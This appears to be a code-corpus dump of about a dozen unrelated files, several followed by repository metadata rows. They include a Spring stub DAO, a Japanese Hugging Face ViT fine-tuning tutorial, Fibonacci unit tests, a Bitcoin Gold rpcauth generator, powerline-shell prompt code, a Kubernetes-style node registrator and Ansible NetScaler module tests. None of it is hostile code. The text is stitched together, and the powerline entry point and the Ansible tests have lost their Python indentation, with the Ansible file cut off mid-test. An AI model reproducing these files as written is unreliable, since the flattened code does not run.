* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package example.scannable;
import org.springframework.stereotype.Repository;
/**
 * Stub repository component in the {@code example.scannable} fixture package,
 * registered under the explicit bean name {@code myNamedDao} via the
 * {@link Repository @Repository} value attribute.
 *
 * @author Juergen Hoeller
 */
@Repository("myNamedDao")
public class NamedStubDao {

	// Stub lookup: ignores the id and always answers "bar".
	public String find(int id) {
		return "bar";
	}

}
<!--Copyright 2022 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
⚠️ Note that this file is in Markdown but contains specific syntax for our doc-builder (similar to MDX) that may not be
rendered properly in your Markdown viewer.
-->
# Image classification
[[open-in-colab]]
<Youtube id="tjAIM7BOYhw"/>
画像分類では、画像にラベルまたはクラスを割り当てます。テキストや音声の分類とは異なり、入力は
画像を構成するピクセル値。損傷の検出など、画像分類には多くの用途があります
自然災害の後、作物の健康状態を監視したり、病気の兆候がないか医療画像をスクリーニングしたりするのに役立ちます。
このガイドでは、次の方法を説明します。
1. [Food-101](https://huggingface.co/datasets/ethz/food101) データセットの [ViT](model_doc/vit) を微調整して、画像内の食品を分類します。
2. 微調整したモデルを推論に使用します。
<Tip>
このタスクと互換性のあるすべてのアーキテクチャとチェックポイントを確認するには、[タスクページ](https://huggingface.co/tasks/image-classification) を確認することをお勧めします。
</Tip>
始める前に、必要なライブラリがすべてインストールされていることを確認してください。
```bash
pip install transformers datasets evaluate
```
Hugging Face アカウントにログインして、モデルをアップロードしてコミュニティと共有することをお勧めします。プロンプトが表示されたら、トークンを入力してログインします。
```py
>>> from huggingface_hub import notebook_login
>>> notebook_login()
```
## Load Food-101 dataset
まず、🤗 Datasets ライブラリから Food-101 データセットの小さいサブセットを読み込みます。これにより、次の機会が得られます
完全なデータセットのトレーニングにさらに時間を費やす前に、実験してすべてが機能することを確認してください。
```py
>>> from datasets import load_dataset
>>> food = load_dataset("ethz/food101", split="train[:5000]")
```
[`~datasets.Dataset.train_test_split`] メソッドを使用して、データセットの `train` 分割をトレイン セットとテスト セットに分割します。
```py
>>> food = food.train_test_split(test_size=0.2)
```
次に、例を見てみましょう。
```py
>>> food["train"][0]
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=512x512 at 0x7F52AFC8AC50>,
'label': 79}
```
データセット内の各例には 2 つのフィールドがあります。
- `image`: 食品の PIL 画像
- `label`: 食品のラベルクラス
モデルがラベル ID からラベル名を取得しやすくするために、ラベル名をマップする辞書を作成します。
整数への変換、またはその逆:
```py
>>> labels = food["train"].features["label"].names
>>> label2id, id2label = dict(), dict()
>>> for i, label in enumerate(labels):
... label2id[label] = str(i)
... id2label[str(i)] = label
```
これで、ラベル ID をラベル名に変換できるようになりました。
```py
>>> id2label[str(79)]
'prime_rib'
```
## Preprocess
次のステップでは、ViT 画像プロセッサをロードして画像をテンソルに処理します。
```py
>>> from transformers import AutoImageProcessor
>>> checkpoint = "google/vit-base-patch16-224-in21k"
>>> image_processor = AutoImageProcessor.from_pretrained(checkpoint)
```
いくつかの画像変換を画像に適用して、モデルの過学習に対する堅牢性を高めます。ここでは torchvision の [`transforms`](https://pytorch.org/vision/stable/transforms.html) モジュールを使用しますが、任意の画像ライブラリを使用することもできます。
画像のランダムな部分をトリミングし、サイズを変更し、画像の平均と標準偏差で正規化します。
```py
>>> from torchvision.transforms import RandomResizedCrop, Compose, Normalize, ToTensor
>>> normalize = Normalize(mean=image_processor.image_mean, std=image_processor.image_std)
>>> size = (
... image_processor.size["shortest_edge"]
... if "shortest_edge" in image_processor.size
... else (image_processor.size["height"], image_processor.size["width"])
... )
>>> _transforms = Compose([RandomResizedCrop(size), ToTensor(), normalize])
```
次に、変換を適用し、画像の `pixel_values` (モデルへの入力) を返す前処理関数を作成します。
```py
>>> def transforms(examples):
... examples["pixel_values"] = [_transforms(img.convert("RGB")) for img in examples["image"]]
... del examples["image"]
... return examples
```
データセット全体に前処理関数を適用するには、🤗 Datasets [`~datasets.Dataset.with_transform`] メソッドを使用します。変換は、データセットの要素を読み込むときにオンザフライで適用されます。
```py
>>> food = food.with_transform(transforms)
```
次に、[`DefaultDataCollator`] を使用してサンプルのバッチを作成します。 🤗 Transformers の他のデータ照合器とは異なり、`DefaultDataCollator` はパディングなどの追加の前処理を適用しません。
```py
>>> from transformers import DefaultDataCollator
>>> data_collator = DefaultDataCollator()
```
## Evaluate
トレーニング中にメトリクスを含めると、多くの場合、モデルのパフォーマンスを評価するのに役立ちます。すぐにロードできます
🤗 [Evaluate](https://huggingface.co/docs/evaluate/index) ライブラリを使用した評価方法。このタスクでは、ロードします
[accuracy](https://huggingface.co/spaces/evaluate-metric/accuracy) 指標 (詳細については、🤗 評価 [クイック ツアー](https://huggingface.co/docs/evaluate/a_quick_tour) を参照してくださいメトリクスをロードして計算する方法):
```py
>>> import evaluate
>>> accuracy = evaluate.load("accuracy")
```
次に、予測とラベルを [`~evaluate.EvaluationModule.compute`] に渡して精度を計算する関数を作成します。
```py
>>> import numpy as np
>>> def compute_metrics(eval_pred):
... predictions, labels = eval_pred
... predictions = np.argmax(predictions, axis=1)
... return accuracy.compute(predictions=predictions, references=labels)
```
これで `compute_metrics`関数の準備が整いました。トレーニングを設定するときにこの関数に戻ります。
## Train
<Tip>
[`Trainer`] を使用したモデルの微調整に慣れていない場合は、[こちら](../training#train-with-pytorch-trainer) の基本的なチュートリアルをご覧ください。
</Tip>
これでモデルのトレーニングを開始する準備が整いました。 [`AutoModelForImageClassification`] を使用して ViT をロードします。予想されるラベルの数と、ラベル マッピングを指定します。
```py
>>> from transformers import AutoModelForImageClassification, TrainingArguments, Trainer
>>> model = AutoModelForImageClassification.from_pretrained(
... checkpoint,
... num_labels=len(labels),
... id2label=id2label,
... label2id=label2id,
... )
```
この時点で残っているステップは 3 つだけです。
1. [`TrainingArguments`] でトレーニング ハイパーパラメータを定義します。 `image` 列が削除されるため、未使用の列を削除しないことが重要です。 `image` 列がないと、`pixel_values` を作成できません。この動作を防ぐには、`remove_unused_columns=False`を設定してください。他に必要なパラメータは、モデルの保存場所を指定する `output_dir` だけです。 `push_to_hub=True`を設定して、このモデルをハブにプッシュします (モデルをアップロードするには、Hugging Face にサインインする必要があります)。各エポックの終了時に、[`Trainer`] は精度を評価し、トレーニング チェックポイントを保存します。
2. トレーニング引数を、モデル、データセット、トークナイザー、データ照合器、および `compute_metrics` 関数とともに [`Trainer`] に渡します。
3. [`~Trainer.train`] を呼び出してモデルを微調整します。
```py
>>> training_args = TrainingArguments(
... output_dir="my_awesome_food_model",
... remove_unused_columns=False,
... eval_strategy="epoch",
... save_strategy="epoch",
... learning_rate=5e-5,
... per_device_train_batch_size=16,
... gradient_accumulation_steps=4,
... per_device_eval_batch_size=16,
... num_train_epochs=3,
... warmup_steps=0.1,
... logging_steps=10,
... load_best_model_at_end=True,
... metric_for_best_model="accuracy",
... push_to_hub=True,
... )
>>> trainer = Trainer(
... model=model,
... args=training_args,
... data_collator=data_collator,
... train_dataset=food["train"],
... eval_dataset=food["test"],
... processing_class=image_processor,
... compute_metrics=compute_metrics,
... )
>>> trainer.train()
```
トレーニングが完了したら、 [`~transformers.Trainer.push_to_hub`] メソッドを使用してモデルをハブに共有し、誰もがモデルを使用できるようにします。
```py
>>> trainer.push_to_hub()
```
<Tip>
画像分類用のモデルを微調整する方法の詳細な例については、対応する [PyTorch ノートブック](https://colab.research.google.com/github/huggingface/notebooks/blob/main/examples/image_classification.ipynb)
</Tip>
## Inference
モデルを微調整したので、それを推論に使用できるようになりました。
推論を実行したい画像を読み込みます。
```py
>>> ds = load_dataset("ethz/food101", split="validation[:10]")
>>> image = ds["image"][0]
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png" alt="image of beignets"/>
</div>
推論用に微調整されたモデルを試す最も簡単な方法は、それを [`pipeline`] で使用することです。モデルを使用して画像分類用の`pipeline`をインスタンス化し、それに画像を渡します。
```py
>>> from transformers import pipeline
>>> classifier = pipeline("image-classification", model="my_awesome_food_model")
>>> classifier(image)
[{'score': 0.31856709718704224, 'label': 'beignets'},
{'score': 0.015232225880026817, 'label': 'bruschetta'},
{'score': 0.01519392803311348, 'label': 'chicken_wings'},
{'score': 0.013022331520915031, 'label': 'pork_chop'},
{'score': 0.012728818692266941, 'label': 'prime_rib'}]
```
必要に応じて、`pipeline`の結果を手動で複製することもできます。
画像プロセッサをロードして画像を前処理し、`input`を PyTorch テンソルとして返します。
```py
>>> from transformers import AutoImageProcessor
>>> import torch
>>> image_processor = AutoImageProcessor.from_pretrained("my_awesome_food_model")
>>> inputs = image_processor(image, return_tensors="pt")
```
入力をモデルに渡し、ロジットを返します。
```py
>>> from transformers import AutoModelForImageClassification
>>> model = AutoModelForImageClassification.from_pretrained("my_awesome_food_model")
>>> with torch.no_grad():
... logits = model(**inputs).logits
```
最も高い確率で予測されたラベルを取得し、モデルの `id2label` マッピングを使用してラベルに変換します。
```py
>>> predicted_label = logits.argmax(-1).item()
>>> model.config.id2label[predicted_label]
'beignets'
``` | unknown | github | https://github.com/huggingface/transformers | docs/source/ja/tasks/image_classification.md |
// Some combinations of features may not use these constants.
// (dead_code is allowed below so feature-gated builds compile cleanly.)
#![cfg_attr(not(feature = "full"), allow(dead_code))]

/// Error string explaining that the Tokio context hasn't been instantiated.
pub(crate) const CONTEXT_MISSING_ERROR: &str =
    "there is no reactor running, must be called from the context of a Tokio 1.x runtime";

/// Error string explaining that the Tokio context is shutting down and cannot drive timers.
pub(crate) const RUNTIME_SHUTTING_DOWN_ERROR: &str =
    "A Tokio 1.x context was found, but it is being shutdown.";

/// Error string explaining that the Tokio context is not available because the
/// thread-local storing it has been destroyed. This usually only happens during
/// destructors of other thread-locals.
pub(crate) const THREAD_LOCAL_DESTROYED_ERROR: &str =
    "The Tokio context thread-local variable has been destroyed.";
import unittest
import fib
class Testing(unittest.TestCase):
    """Sanity check that the unittest harness itself runs."""

    def test_testing(self):
        # Trivially true; proves the runner picks up this module.
        self.assertEqual(1, 1, "Of course it does!")
class Fib_(unittest.TestCase):
    """Shared assertions for the various fib implementations.

    Subclasses point ``self.fib`` at a concrete implementation in
    ``setUp`` and expose the relevant helpers below as ``test_*``
    methods.
    """

    def setUp(self):
        # Default implementation; subclasses override this.
        self.fib = fib.fib2

    def basecase_num_1(self):
        self.assertEqual(self.fib(1), 0, "fib num 1 is not correct")

    def basecase_num_2(self):
        self.assertEqual(self.fib(2), 1, "fib num 2 is not correct")

    def fib_num_10(self):
        # Sequence starts at 0, so the 10th Fibonacci number is 34.
        # (The old failure message claimed 33, contradicting the assert.)
        self.assertEqual(self.fib(10), 34, "fib 10 is not 34")

    def basecase_list_1(self):
        self.assertEqual(self.fib(1), [0], "fib list with one item is not correct")

    def basecase_list_2(self):
        self.assertEqual(self.fib(2), [0, 1], "fib list 2 with two items is not correct")

    def fib_list_10(self):
        self.assertEqual(self.fib(10), [0, 1, 1, 2, 3, 5, 8, 13, 21, 34],
                         "Fib list ten is not correct")
class Fib1_testing(Fib_):
    """Runs the list-based assertions against ``fib.fib1``."""

    def setUp(self):
        # fib1 is exercised via the list helpers, so it is expected to
        # return the Fibonacci sequence as a list.
        self.fib = fib.fib1

    def test_basecase_1(self):
        self.basecase_list_1()

    def test_basecase_2(self):
        self.basecase_list_2()

    def test_fib_list_10(self):
        self.fib_list_10()
class Fib2_testing(Fib_):
    """Runs the single-number assertions against ``fib.fib2``."""

    def setUp(self):
        # fib2 is exercised via the numeric helpers, so it is expected
        # to return a single Fibonacci number.
        self.fib = fib.fib2

    def test_basecase_1(self):
        self.basecase_num_1()

    def test_basecase_2(self):
        self.basecase_num_2()

    def test_fib_num_10(self):
        self.fib_num_10()
class Fib_yield_list(Fib1_testing):
    """Reuses the list assertions against ``fib.fib_list``."""

    def setUp(self):
        self.fib = fib.fib_list
class Fib_yield_num(Fib2_testing):
    """Reuses the numeric assertions against ``fib.nth_fib_num``."""

    def setUp(self):
        self.fib = fib.nth_fib_num
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
<!-- #docregion control-binding -->
<label for="name">Name: </label>
<input id="name" type="text" [formControl]="name" />
<!-- #enddocregion control-binding -->
<!-- #docregion display-value -->
<p>Value: {{ name.value }}</p>
<!-- #enddocregion display-value -->
<!-- #docregion update-value -->
<button type="button" (click)="updateName()">Update Name</button>
<!-- #enddocregion update-value --> | html | github | https://github.com/angular/angular | adev/src/content/examples/reactive-forms/src/app/name-editor/name-editor.component.html |
{
"compilerOptions": {
"incremental": true,
"target": "es5",
"lib": ["dom", "dom.iterable", "esnext"],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"forceConsistentCasingInFileNames": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "node",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "react-jsx"
},
"include": ["next-env.d.ts", "**/*.ts", "**/*.tsx"],
"exclude": ["node_modules"]
} | json | github | https://github.com/vercel/next.js | examples/with-react-intl/tsconfig.json |
#!/usr/bin/env python2
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate an 'rpcauth' credential line for bitcoingold.conf: a random
# password plus the salted HMAC-SHA256 digest the server stores.

import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac

if len(sys.argv) < 2:
    sys.stderr.write('Please include username as an argument.\n')
    # Exit non-zero: a missing argument is an error, not success.
    sys.exit(1)

username = sys.argv[1]

# SystemRandom uses os.urandom() underneath.
cryptogen = SystemRandom()

# Create a 16 byte hex salt.  Format every byte as exactly two hex
# digits; the previous hex()-based formatting dropped leading zeros and
# silently produced a shorter salt.
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
salt = "".join('{0:02x}'.format(b) for b in salt_sequence)

# Create a 32 byte urlsafe-base64 password.
password = base64.urlsafe_b64encode(os.urandom(32))

digestmod = hashlib.sha256

if sys.version_info.major >= 3:
    # On Python 3, hmac wants a named digest and str inputs below.
    password = password.decode('utf-8')
    digestmod = 'SHA256'

m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()

print("String to be appended to bitcoingold.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import sys
def warn(msg):
    """Emit a warning to stdout, tagged with the powerline-bash prefix."""
    prefix = '[powerline-bash] '
    print(prefix, msg)
class Powerline:
    """Builds and renders a powerline-style shell prompt.

    Segments are appended with ``append`` and rendered with ``draw``.
    """

    # Separator/lock glyphs per rendering mode: 'patched' requires a
    # powerline-patched font, 'compatible' uses plain Unicode/ASCII,
    # 'flat' draws no separators at all.
    symbols = {
        'compatible': {
            'lock': 'RO',
            'network': 'SSH',
            'separator': u'\u25B6',
            'separator_thin': u'\u276F'
        },
        'patched': {
            'lock': u'\uE0A2',
            'network': u'\uE0A2',
            'separator': u'\uE0B0',
            'separator_thin': u'\uE0B1'
        },
        'flat': {
            'lock': '',
            'network': '',
            'separator': '',
            'separator_thin': ''
        },
    }

    # Wrappers that make raw ANSI escape codes safe for each shell's
    # prompt-width accounting (bash \[..\], zsh %{..%}, or nothing).
    color_templates = {
        'bash': '\\[\\e%s\\]',
        'zsh': '%%{%s%%}',
        'bare': '%s',
    }

    def __init__(self, args, cwd):
        # `args` is the parsed argparse namespace; `cwd` the working dir.
        self.args = args
        self.cwd = cwd
        mode, shell = args.mode, args.shell
        self.color_template = self.color_templates[shell]
        self.reset = self.color_template % '[0m'
        self.lock = Powerline.symbols[mode]['lock']
        self.network = Powerline.symbols[mode]['network']
        self.separator = Powerline.symbols[mode]['separator']
        self.separator_thin = Powerline.symbols[mode]['separator_thin']
        self.segments = []

    def color(self, prefix, code):
        # 256-color escape; `prefix` selects foreground (38) vs
        # background (48).  None means "no color".
        if code is None:
            return ''
        else:
            return self.color_template % ('[%s;5;%sm' % (prefix, code))

    def fgcolor(self, code):
        return self.color('38', code)

    def bgcolor(self, code):
        return self.color('48', code)

    def append(self, content, fg, bg, separator=None, separator_fg=None):
        # Each segment tuple: (text, fg, bg, separator, separator_fg);
        # the separator defaults to the mode glyph drawn in `bg`.
        self.segments.append((content, fg, bg,
            separator if separator is not None else self.separator,
            separator_fg if separator_fg is not None else bg))

    def draw(self):
        # NOTE(review): this returns UTF-8 bytes concatenated with a str
        # (' '), which only works on Python 2 -- confirm target runtime.
        return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
            + self.reset).encode('utf-8') + ' '

    def draw_segment(self, idx):
        segment = self.segments[idx]
        # Look ahead: the separator is drawn over the NEXT segment's
        # background (or the reset code for the final segment).
        next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
        return ''.join((
            self.fgcolor(segment[1]),
            self.bgcolor(segment[2]),
            segment[0],
            self.bgcolor(next_segment[2]) if next_segment else self.reset,
            self.fgcolor(segment[4]),
            segment[3]))
def get_valid_cwd():
    """Return the shell's current working directory, warning if invalid.

    The directory can vanish underneath us (e.g. after checking out a git
    branch that lacks it).  We still return the original cwd because the
    shell considers it the working directory; returning our best guess
    would only confuse people.
    """
    # Prefer $PWD: os.getcwd() resolves symbolic links, which we do not
    # want.  Fall back to os.getcwd() when $PWD is unset.
    try:
        cwd = os.getenv('PWD') or os.getcwd()
    except:
        warn("Your current directory is invalid. If you open a ticket at " +
            "https://github.com/milkbikis/powerline-shell/issues/new " +
            "we would love to help fix the issue.")
        sys.stdout.write("> ")
        sys.exit(1)

    # Walk upwards until some prefix of the path still exists, purely to
    # produce a helpful warning.
    parts = cwd.split(os.sep)
    valid = cwd
    while parts and not os.path.exists(valid):
        parts.pop()
        valid = os.sep.join(parts)
    if cwd != valid:
        warn("Your current directory is invalid. Lowest valid directory: "
            + valid)
    return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-mode', action='store',
help='How to display the current directory', default='fancy',
choices=['fancy', 'plain', 'dironly'])
arg_parser.add_argument('--cwd-only', action='store_true',
help='Deprecated. Use --cwd-mode=dironly')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--cwd-max-dir-size', action='store', type=int,
help='Maximum number of letters displayed for each directory in the path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd()) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright 2015 The QingYuan Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import httplib
import json
import time
class Registrator:
    """Registers a minion (node) with the QingYuan API server over HTTP."""

    def __init__(self):
        # Skeleton Minion payload; callers fill in the empty fields
        # through the `data` property before calling `register()`.
        self.ds = {
            "creationTimestamp": "",
            "kind": "Minion",
            "name": "",  # private_address
            "metadata": {
                "name": "",  # private_address
            },
            "spec": {
                "externalID": "",  # private_address
                "capacity": {
                    "mem": "",  # mem + ' K'
                    "cpu": "",  # cpus
                }
            },
            "status": {
                "conditions": [],
                "hostIP": "",  # private_address
            }
        }

    @property
    def data(self):
        ''' Returns a data-structure for population to make a request. '''
        return self.ds

    def register(self, hostname, port, api_path):
        ''' Contact the API Server for a new registration.

        Returns the (response, parsed-JSON-result) pair.
        '''
        headers = {"Content-type": "application/json",
                   "Accept": "application/json"}
        connection = httplib.HTTPConnection(hostname, port)
        # Was a Python 2-only `print` statement; use the function form.
        print('CONN {}'.format(connection))
        try:
            connection.request("POST", api_path, json.dumps(self.data), headers)
            response = connection.getresponse()
            body = response.read()
            print(body)
            result = json.loads(body)
            print("Response status:%s reason:%s body:%s" %
                  (response.status, response.reason, result))
            return response, result
        finally:
            # Always release the socket, even when the request fails.
            connection.close()

    def update(self):
        ''' Contact the API Server to update a registration. '''
        # do a get on the API for the node
        # repost to the API with any modified data
        pass

    def save(self):
        ''' Marshall the registration data. '''
        # TODO
        pass

    def command_succeeded(self, response, result):
        ''' Evaluate response data to determine if the command was successful.

        Returns True on success and False on a 409 conflict; raises
        ValueError (retryable) on the known 500 quirk, RuntimeError on
        anything else.
        '''
        if response.status in (200, 201):
            print("Registered")
            return True
        elif response.status == 409:
            print("Status Conflict")
            # Suggested: re-send as a PUT (update) on conflict.  The old
            # code fell through here and implicitly returned None; return
            # False explicitly so callers get a real boolean.
            return False
        elif response.status == 500 and result.get(
                'message', '').startswith('The requested resource does not exist'):
            # There's something fishy in the qing api here (0.4 dev): the
            # first registration of a new minion often returns this error.
            # https://github.com/qingyuancloud/QingYuan/issues/1995
            time.sleep(1)
            print("Retrying registration...")
            raise ValueError("Registration returned 500, retry")
        else:
            print("Registration error")
            # The old message was truncated ("... register machine with").
            raise RuntimeError("Unable to register machine with the API server")
//// [tests/cases/conformance/async/es5/functionDeclarations/asyncFunctionDeclaration3_es5.ts] ////
//// [asyncFunctionDeclaration3_es5.ts]
function f(await = await) {
}
//// [asyncFunctionDeclaration3_es5.js]
"use strict";
function f(await) {
if (await === void 0) { await = await; }
} | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/asyncFunctionDeclaration3_es5(target=es5).js |
# Copyright (c) 2017 Citrix Systems
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from ansible.compat.tests.mock import patch, Mock, MagicMock, call
import sys
if sys.version_info[:2] != (2, 6):
import requests
from units.modules.utils import set_module_args
from .netscaler_module import TestModule, nitro_base_patcher
class TestNetscalerServiceModule(TestModule):
@classmethod
def setUpClass(cls):
m = MagicMock()
cls.service_mock = MagicMock()
cls.service_mock.__class__ = MagicMock()
cls.service_lbmonitor_binding_mock = MagicMock()
cls.lbmonitor_service_binding_mock = MagicMock()
nssrc_modules_mock = {
'nssrc.com.citrix.netscaler.nitro.resource.config.basic': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service.service': cls.service_mock,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service_lbmonitor_binding': cls.service_lbmonitor_binding_mock,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service_lbmonitor_binding.service_lbmonitor_binding': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb.lbmonitor_service_binding': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb.lbmonitor_service_binding.lbmonitor_service_binding': cls.lbmonitor_service_binding_mock,
}
cls.nitro_specific_patcher = patch.dict(sys.modules, nssrc_modules_mock)
cls.nitro_base_patcher = nitro_base_patcher
@classmethod
def tearDownClass(cls):
cls.nitro_base_patcher.stop()
cls.nitro_specific_patcher.stop()
def set_module_state(self, state):
set_module_args(dict(
nitro_user='user',
nitro_pass='pass',
nsip='1.1.1.1',
state=state,
))
def setUp(self):
super(TestNetscalerServiceModule, self).setUp()
self.nitro_base_patcher.start()
self.nitro_specific_patcher.start()
# Setup minimal required arguments to pass AnsibleModule argument parsing
def tearDown(self):
super(TestNetscalerServiceModule, self).tearDown()
self.nitro_base_patcher.stop()
self.nitro_specific_patcher.stop()
def test_graceful_nitro_api_import_error(self):
# Stop nitro api patching to cause ImportError
self.set_module_state('present')
self.nitro_base_patcher.stop()
self.nitro_specific_patcher.stop()
from ansible.modules.network.netscaler import netscaler_service
self.module = netscaler_service
result = self.failed()
self.assertEqual(result['msg'], 'Could not load nitro python sdk')
def test_graceful_nitro_error_on_login(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
def __init__(self, *args, **kwargs):
self.errorcode = 0
self.message = ''
client_mock = Mock()
client_mock.login = Mock(side_effect=MockException)
m = Mock(return_value=client_mock)
with patch('ansible.modules.network.netscaler.netscaler_service.get_nitro_client', m):
with patch('ansible.modules.network.netscaler.netscaler_service.nitro_exception', MockException):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('nitro exception'), msg='nitro exception during login not handled properly')
def test_graceful_no_connection_error(self):
if sys.version_info[:2] == (2, 6):
self.skipTest('requests library not available under python2.6')
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
pass
client_mock = Mock()
attrs = {'login.side_effect': requests.exceptions.ConnectionError}
client_mock.configure_mock(**attrs)
m = Mock(return_value=client_mock)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
get_nitro_client=m,
nitro_exception=MockException,
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('Connection error'), msg='Connection error was not handled gracefully')
def test_graceful_login_error(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
if sys.version_info[:2] == (2, 6):
self.skipTest('requests library not available under python2.6')
class MockException(Exception):
pass
client_mock = Mock()
attrs = {'login.side_effect': requests.exceptions.SSLError}
client_mock.configure_mock(**attrs)
m = Mock(return_value=client_mock)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
get_nitro_client=m,
nitro_exception=MockException,
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('SSL Error'), msg='SSL Error was not handled gracefully')
def test_create_non_existing_service(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[False, True])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.add()])
self.assertTrue(result['changed'], msg='Change not recorded')
def test_update_service_when_service_differs(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[False, True])
monitor_bindings_identical_mock = Mock(side_effect=[True, True])
all_identical_mock = Mock(side_effect=[False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
all_identical=all_identical_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.update()])
self.assertTrue(result['changed'], msg='Change not recorded')
def test_update_service_when_monitor_bindings_differ(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[True, True])
monitor_bindings_identical_mock = Mock(side_effect=[False, True])
all_identical_mock = Mock(side_effect=[False])
sync_monitor_bindings_mock = Mock()
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
all_identical=all_identical_mock,
sync_monitor_bindings=sync_monitor_bindings_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
# poor man's assert_called_once since python3.5 does not implement that mock method
self.assertEqual(len(sync_monitor_bindings_mock.mock_calls), 1, msg='sync monitor bindings not called once')
self.assertTrue(result['changed'], msg='Change not recorded')
def test_no_change_to_module_when_all_identical(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
